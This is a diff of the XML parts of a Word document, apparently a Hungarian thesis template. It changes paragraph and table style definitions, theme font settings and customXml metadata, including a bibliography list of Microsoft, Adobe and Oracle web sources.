+      <w:spacing w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -3446,25 +3517,25 @@
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="tmutat" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tmutat">
     <w:name w:val="Útmutató"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:qFormat/>
     <w:rsid w:val="00267677"/>
     <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="240"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
     </w:pPr>
     <w:rPr>
       <w:sz w:val="21"/>
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="tmutatcm" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tmutatcm">
     <w:name w:val="Útmutató cím"/>
     <w:basedOn w:val="tmutat"/>
     <w:qFormat/>
-    <w:rsid w:val="0090541f"/>
+    <w:rsid w:val="0090541F"/>
     <w:pPr>
       <w:jc w:val="center"/>
     </w:pPr>
@@ -3473,66 +3544,63 @@
       <w:sz w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Nyilatkozatszveg" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatszveg">
     <w:name w:val="Nyilatkozat szöveg"/>
-    <w:basedOn w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="00854bdc"/>
-    <w:pPr>
-      <w:ind w:hanging="0"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nyilatkozatalrs" w:customStyle="1">
+    <w:basedOn w:val="Normln"/>
+    <w:qFormat/>
+    <w:rsid w:val="00854BDC"/>
+    <w:pPr>
+      <w:ind w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatalrs">
     <w:name w:val="Nyilatkozat aláírás"/>
     <w:basedOn w:val="Nyilatkozatszveg"/>
     <w:qFormat/>
-    <w:rsid w:val="00854bdc"/>
+    <w:rsid w:val="00854BDC"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="center" w:pos="6237" w:leader="none"/>
+        <w:tab w:val="center" w:pos="6237"/>
       </w:tabs>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
-      <w:ind w:start="3686"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Cmlaplog" w:customStyle="1">
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:ind w:left="3686"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlaplog">
     <w:name w:val="Címlap logó"/>
-    <w:basedOn w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="00d429f2"/>
-    <w:pPr>
-      <w:ind w:hanging="0"/>
+    <w:basedOn w:val="Normln"/>
+    <w:qFormat/>
+    <w:rsid w:val="00D429F2"/>
+    <w:pPr>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Cmlapkarstanszk" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapkarstanszk">
     <w:name w:val="Címlap kar és tanszék"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Cmlapegyetem" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapegyetem">
     <w:name w:val="Címlap egyetem"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
-      <w:ind w:hanging="0"/>
+      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3541,20 +3609,20 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="IntenseQuote">
+  <w:style w:type="paragraph" w:styleId="Vrazncitt">
     <w:name w:val="Intense Quote"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:link w:val="VrazncittChar"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
+    <w:rsid w:val="003F5425"/>
     <w:pPr>
       <w:pBdr>
         <w:bottom w:val="single" w:sz="4" w:space="4" w:color="4F81BD"/>
       </w:pBdr>
       <w:spacing w:before="200" w:after="280"/>
-      <w:ind w:start="936" w:end="936"/>
+      <w:ind w:left="936" w:right="936"/>
     </w:pPr>
     <w:rPr>
       <w:b/>
@@ -3564,89 +3632,78 @@
       <w:color w:val="4F81BD"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="ListParagraph">
+  <w:style w:type="paragraph" w:styleId="Odstavecseseznamem">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
-    <w:pPr>
-      <w:ind w:start="708"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Quote">
+    <w:rsid w:val="003F5425"/>
+    <w:pPr>
+      <w:ind w:left="708"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Citt">
     <w:name w:val="Quote"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:link w:val="CittChar"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
-    <w:pPr/>
+    <w:rsid w:val="003F5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
       <w:color w:val="000000"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="NoSpacing">
+  <w:style w:type="paragraph" w:styleId="Bezmezer">
     <w:name w:val="No Spacing"/>
     <w:uiPriority w:val="1"/>
     <w:qFormat/>
-    <w:rsid w:val="003f5425"/>
-    <w:pPr>
-      <w:widowControl/>
-      <w:suppressAutoHyphens w:val="true"/>
-      <w:bidi w:val="0"/>
-      <w:spacing w:before="0" w:after="0"/>
+    <w:rsid w:val="003F5425"/>
+    <w:pPr>
       <w:ind w:firstLine="720"/>
       <w:jc w:val="both"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-      <w:color w:val="auto"/>
-      <w:kern w:val="0"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Picture" w:customStyle="1">
+      <w:lang w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Picture">
     <w:name w:val="Picture"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Caption"/>
-    <w:qFormat/>
-    <w:rsid w:val="002841f9"/>
-    <w:pPr>
-      <w:keepNext w:val="true"/>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
-      <w:ind w:hanging="0"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Titulek"/>
+    <w:qFormat/>
+    <w:rsid w:val="002841F9"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
+      <w:ind w:firstLine="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Code" w:customStyle="1">
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
     <w:name w:val="Code"/>
-    <w:basedOn w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="00225f65"/>
+    <w:basedOn w:val="Normln"/>
+    <w:qFormat/>
+    <w:rsid w:val="00225F65"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="clear" w:pos="720"/>
-        <w:tab w:val="left" w:pos="851" w:leader="none"/>
-        <w:tab w:val="left" w:pos="1418" w:leader="none"/>
-        <w:tab w:val="left" w:pos="1985" w:leader="none"/>
-        <w:tab w:val="left" w:pos="2552" w:leader="none"/>
-        <w:tab w:val="left" w:pos="3119" w:leader="none"/>
-        <w:tab w:val="left" w:pos="3686" w:leader="none"/>
-        <w:tab w:val="left" w:pos="4253" w:leader="none"/>
-        <w:tab w:val="left" w:pos="4820" w:leader="none"/>
-        <w:tab w:val="left" w:pos="5387" w:leader="none"/>
-        <w:tab w:val="left" w:pos="5954" w:leader="none"/>
+        <w:tab w:val="left" w:pos="851"/>
+        <w:tab w:val="left" w:pos="1418"/>
+        <w:tab w:val="left" w:pos="1985"/>
+        <w:tab w:val="left" w:pos="2552"/>
+        <w:tab w:val="left" w:pos="3119"/>
+        <w:tab w:val="left" w:pos="3686"/>
+        <w:tab w:val="left" w:pos="4253"/>
+        <w:tab w:val="left" w:pos="4820"/>
+        <w:tab w:val="left" w:pos="5387"/>
+        <w:tab w:val="left" w:pos="5954"/>
       </w:tabs>
-      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
-      <w:ind w:hanging="0" w:start="284"/>
+      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
+      <w:ind w:left="284" w:firstLine="0"/>
       <w:contextualSpacing/>
     </w:pPr>
     <w:rPr>
@@ -3654,31 +3711,28 @@
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="IndexHeading">
+  <w:style w:type="paragraph" w:styleId="Hlavikarejstku">
     <w:name w:val="index heading"/>
     <w:basedOn w:val="Heading"/>
-    <w:pPr/>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TOCHeading">
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nadpisobsahu">
     <w:name w:val="TOC Heading"/>
-    <w:basedOn w:val="Heading1"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Nadpis1"/>
+    <w:next w:val="Normln"/>
     <w:uiPriority w:val="39"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="0001192f"/>
+    <w:rsid w:val="0001192F"/>
     <w:pPr>
       <w:keepLines/>
-      <w:pageBreakBefore w:val="false"/>
+      <w:pageBreakBefore w:val="0"/>
       <w:numPr>
-        <w:ilvl w:val="0"/>
         <w:numId w:val="0"/>
       </w:numPr>
-      <w:spacing w:lineRule="auto" w:line="276" w:before="480" w:after="0"/>
+      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
       <w:ind w:firstLine="720"/>
-      <w:jc w:val="start"/>
+      <w:jc w:val="left"/>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
     <w:rPr>
@@ -3690,146 +3744,112 @@
       <w:lang w:eastAsia="hu-HU"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Headline" w:customStyle="1">
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Headline">
     <w:name w:val="Headline"/>
     <w:basedOn w:val="Fejezetcimszmozsnlkl"/>
-    <w:next w:val="Normal"/>
-    <w:qFormat/>
-    <w:rsid w:val="00b96880"/>
+    <w:next w:val="Normln"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B96880"/>
     <w:pPr>
       <w:outlineLvl w:val="9"/>
     </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="CommentText">
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Textkomente">
     <w:name w:val="annotation text"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
     <w:link w:val="TextkomenteChar"/>
-    <w:rsid w:val="00630a92"/>
-    <w:pPr>
-      <w:spacing w:lineRule="auto" w:line="240"/>
+    <w:rsid w:val="00630A92"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
     </w:pPr>
     <w:rPr>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="annotationsubject">
+  <w:style w:type="paragraph" w:styleId="Pedmtkomente">
     <w:name w:val="annotation subject"/>
-    <w:basedOn w:val="CommentText"/>
-    <w:next w:val="CommentText"/>
+    <w:basedOn w:val="Textkomente"/>
+    <w:next w:val="Textkomente"/>
     <w:link w:val="PedmtkomenteChar"/>
     <w:qFormat/>
-    <w:rsid w:val="00630a92"/>
-    <w:pPr/>
+    <w:rsid w:val="00630A92"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Bibliography">
+  <w:style w:type="paragraph" w:styleId="Bibliografie">
     <w:name w:val="Bibliography"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:basedOn w:val="Normln"/>
+    <w:next w:val="Normln"/>
     <w:uiPriority w:val="37"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="009b2eed"/>
-    <w:pPr>
-      <w:ind w:hanging="0"/>
-    </w:pPr>
-    <w:rPr/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Revision">
+    <w:rsid w:val="009B2EED"/>
+    <w:pPr>
+      <w:ind w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Revize">
     <w:name w:val="Revision"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:qFormat/>
-    <w:rsid w:val="0046068c"/>
-    <w:pPr>
-      <w:widowControl/>
-      <w:suppressAutoHyphens w:val="true"/>
-      <w:bidi w:val="0"/>
-      <w:spacing w:before="0" w:after="0"/>
-      <w:jc w:val="start"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-      <w:color w:val="auto"/>
-      <w:kern w:val="0"/>
+    <w:rsid w:val="0046068C"/>
+    <w:rPr>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
-      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="tmutat-felsorols" w:customStyle="1">
+      <w:lang w:eastAsia="en-US"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutat-felsorols">
     <w:name w:val="Útmutató - felsorolás"/>
     <w:qFormat/>
-    <w:rsid w:val="000062f4"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="tmutatfelsorols" w:customStyle="1">
+    <w:rsid w:val="000062F4"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatfelsorols">
     <w:name w:val="Útmutató felsorolás"/>
     <w:qFormat/>
-    <w:rsid w:val="003a4cdb"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm" w:customStyle="1">
+    <w:rsid w:val="003A4CDB"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm">
     <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ..."/>
     <w:qFormat/>
-    <w:rsid w:val="003a4cdb"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm1" w:customStyle="1">
+    <w:rsid w:val="003A4CDB"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm1">
     <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ...1"/>
     <w:qFormat/>
-    <w:rsid w:val="003a4cdb"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="tmutatszmozottlista" w:customStyle="1">
+    <w:rsid w:val="003A4CDB"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatszmozottlista">
     <w:name w:val="Útmutató számozott lista"/>
     <w:qFormat/>
-    <w:rsid w:val="00d429f2"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="Irodalomjegyzkttel" w:customStyle="1">
+    <w:rsid w:val="00D429F2"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="Irodalomjegyzkttel">
     <w:name w:val="Irodalomjegyzék tétel"/>
     <w:qFormat/>
-    <w:rsid w:val="006f512e"/>
-  </w:style>
-  <w:style w:type="numbering" w:styleId="tmutatlista" w:customStyle="1">
+    <w:rsid w:val="006F512E"/>
+  </w:style>
+  <w:style w:type="numbering" w:customStyle="1" w:styleId="tmutatlista">
     <w:name w:val="Útmutató lista"/>
     <w:qFormat/>
     <w:rsid w:val="00267677"/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
   </w:style>
   <w:style w:type="table" w:styleId="Mkatabulky">
     <w:name w:val="Table Grid"/>
     <w:basedOn w:val="Normlntabulka"/>
-    <w:rsid w:val="002605c9"/>
+    <w:rsid w:val="002605C9"/>
     <w:tblPr>
       <w:tblBorders>
-        <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
-        <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
     </w:tblPr>
   </w:style>
@@ -3837,17 +3857,17 @@
     <w:name w:val="Grid Table 1 Light"/>
     <w:basedOn w:val="Normlntabulka"/>
     <w:uiPriority w:val="46"/>
-    <w:rsid w:val="003512ca"/>
+    <w:rsid w:val="003512CA"/>
     <w:tblPr>
       <w:tblStyleRowBandSize w:val="1"/>
       <w:tblStyleColBandSize w:val="1"/>
       <w:tblBorders>
-        <w:top w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
-        <w:left w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
-        <w:bottom w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
-        <w:right w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
-        <w:insideH w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
-        <w:insideV w:val="single" w:color="999999" w:themeColor="text1" w:themeTint="66" w:sz="4" w:space="0"/>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="999999" w:themeColor="text1" w:themeTint="66"/>
       </w:tblBorders>
     </w:tblPr>
     <w:tblStylePr w:type="firstRow">
@@ -3858,7 +3878,7 @@
       <w:tblPr/>
       <w:tcPr>
         <w:tcBorders>
-          <w:bottom w:val="single" w:color="666666" w:themeColor="text1" w:sz="12" w:space="0"/>
+          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000" w:themeColor="text1"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -3870,7 +3890,7 @@
       <w:tblPr/>
       <w:tcPr>
         <w:tcBorders>
-          <w:top w:val="double" w:color="666666" w:themeColor="text1" w:sz="2" w:space="0"/>
+          <w:top w:val="double" w:sz="2" w:space="0" w:color="000000" w:themeColor="text1"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -3879,21 +3899,19 @@
         <w:b/>
         <w:bCs/>
       </w:rPr>
-      <w:tblPr/>
     </w:tblStylePr>
     <w:tblStylePr w:type="lastCol">
       <w:rPr>
         <w:b/>
         <w:bCs/>
       </w:rPr>
-      <w:tblPr/>
     </w:tblStylePr>
   </w:style>
 </w:styles>
 </file>
 
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
-<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Office-téma">
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office-téma">
   <a:themeElements>
     <a:clrScheme name="Office">
       <a:dk1>
@@ -3935,12 +3953,12 @@
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="0" charset="1"/>
+        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="0" charset="1"/>
+        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:minorFont>
@@ -3972,7 +3990,7 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect l="0" t="0" r="0" b="0"/>
+          <a:tileRect/>
         </a:gradFill>
         <a:gradFill>
           <a:gsLst>
@@ -3996,7 +4014,7 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect l="0" t="0" r="0" b="0"/>
+          <a:tileRect/>
         </a:gradFill>
       </a:fillStyleLst>
       <a:lnStyleLst>
@@ -4056,15 +4074,25 @@
             </a:gs>
           </a:gsLst>
           <a:lin ang="5400000" scaled="0"/>
-          <a:tileRect l="0" t="0" r="0" b="0"/>
+          <a:tileRect/>
         </a:gradFill>
       </a:bgFillStyleLst>
     </a:fmtScheme>
   </a:themeElements>
+  <a:objectDefaults/>
+  <a:extraClrSchemeLst/>
 </a:theme>
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="2c71b88f-36ae-449a-8a52-10e2658bdd67" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <?mso-contentType ?>
 <FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
   <Display>DocumentLibraryForm</Display>
@@ -4073,214 +4101,7 @@
 </FormTemplates>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="2c71b88f-36ae-449a-8a52-10e2658bdd67" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
-  <b:Source>
-    <b:Tag>Mic24</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{0073F013-6D5F-4606-9619-199470B72B61}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Microsoft</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>What is ASP.NET Core</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>September</b:MonthAccessed>
-    <b:DayAccessed>28</b:DayAccessed>
-    <b:URL>https://dotnet.microsoft.com/en-us/learn/aspnet/what-is-aspnet-core</b:URL>
-    <b:RefOrder>5</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gra19</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{0023DC8F-EE4E-49BF-8AA1-FC23135D0750}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Adobe Acrobat Team</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>Fast-forward — comparing a 1980s supercomputer to the modern smartphone</b:Title>
-    <b:Year>2022</b:Year>
-    <b:Month>August</b:Month>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>04</b:DayAccessed>
-    <b:URL>https://blog.adobe.com/en/publish/2022/11/08/fast-forward-comparing-1980s-supercomputer-to-modern-smartphone</b:URL>
-    <b:RefOrder>1</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Mic242</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{11AB6DA6-D471-47C8-9787-23B1CD788504}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Microsoft</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>How Blazor works</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>10</b:DayAccessed>
-    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/3-how-blazor-works</b:URL>
-    <b:RefOrder>8</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Mic241</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{DC716AFD-7D9B-4295-ACEB-8ABB9F132259}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Microsoft</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>What is Blazor?</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>10</b:DayAccessed>
-    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/2-what-is-blazor</b:URL>
-    <b:RefOrder>7</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ora24</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{8E8F59A1-5E4C-4F43-B41B-AF71B2F4EDAF}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Oracle</b:Corporate>
-      </b:Author>
-    </b:Author>
